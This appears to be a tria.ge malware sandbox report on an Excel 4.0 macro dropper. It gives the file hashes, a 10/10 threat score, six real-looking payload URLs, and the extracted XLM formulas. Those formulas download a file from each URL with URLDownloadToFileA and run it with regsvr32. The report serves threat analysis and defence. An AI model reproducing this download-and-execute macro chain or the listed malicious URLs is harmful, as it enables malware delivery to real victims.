Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

General

  • Target

    af2a4a5908dae03f4a7e479a7a965497483dd4e99d1744367ad986cf8a63a4c5

  • Size

    48KB

  • Sample

    241111-13jyaswret

  • MD5

    ea630071369fb92e49d1a08a0f80698b

  • SHA1

    937216417a51e962cee42f5ba3863fb18f83f342

  • SHA256

    af2a4a5908dae03f4a7e479a7a965497483dd4e99d1744367ad986cf8a63a4c5

  • SHA512

    dce3ab19592942b5f719b4d60ec6928547e6b37f2319a76cc849e574399e62299e8d8e126726957413bf36db6d1c6cc4005d139c77424cdccb2a3dd8768fd51f

  • SSDEEP

    768:nO+CAEWvxRc3mlkKDNWBA7rTj+RYV8Q0RuVBR2jPrtysHRX0AOBAa:n7O2b8QkKDNck01u/R2rZyjtBl

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://suleyera.com/components/CNGhltc5v2K6/

http://sociallysavvyseo.com/PinnacleDynamicServices/pRlYMzvfuu5B/

http://moveit.savvyint.com/config/DsfssbO7BYG/

https://schwizer.net/styled/D0MG/

http://shabeerpv.atwebpages.com/css/ww6if1YAsMpjpuGz/

http://shimal.atwebpages.com/wp-content/xkaRkHr/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://suleyera.com/components/CNGhltc5v2K6/","..\ax.ocx",0,0) =IF('LGGDGB'!E11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://sociallysavvyseo.com/PinnacleDynamicServices/pRlYMzvfuu5B/","..\ax.ocx",0,0)) =IF('LGGDGB'!E13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://moveit.savvyint.com/config/DsfssbO7BYG/","..\ax.ocx",0,0)) =IF('LGGDGB'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://schwizer.net/styled/D0MG/","..\ax.ocx",0,0)) =IF('LGGDGB'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://shabeerpv.atwebpages.com/css/ww6if1YAsMpjpuGz/","..\ax.ocx",0,0)) =IF('LGGDGB'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://shimal.atwebpages.com/wp-content/xkaRkHr/","..\ax.ocx",0,0)) =IF('LGGDGB'!E21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\ax.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://suleyera.com/components/CNGhltc5v2K6/

xlm40.dropper

http://sociallysavvyseo.com/PinnacleDynamicServices/pRlYMzvfuu5B/

Targets

    • Target

      af2a4a5908dae03f4a7e479a7a965497483dd4e99d1744367ad986cf8a63a4c5

    • Size

      48KB

    • MD5

      ea630071369fb92e49d1a08a0f80698b

    • SHA1

      937216417a51e962cee42f5ba3863fb18f83f342

    • SHA256

      af2a4a5908dae03f4a7e479a7a965497483dd4e99d1744367ad986cf8a63a4c5

    • SHA512

      dce3ab19592942b5f719b4d60ec6928547e6b37f2319a76cc849e574399e62299e8d8e126726957413bf36db6d1c6cc4005d139c77424cdccb2a3dd8768fd51f

    • SSDEEP

      768:nO+CAEWvxRc3mlkKDNWBA7rTj+RYV8Q0RuVBR2jPrtysHRX0AOBAa:n7O2b8QkKDNck01u/R2rZyjtBl

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks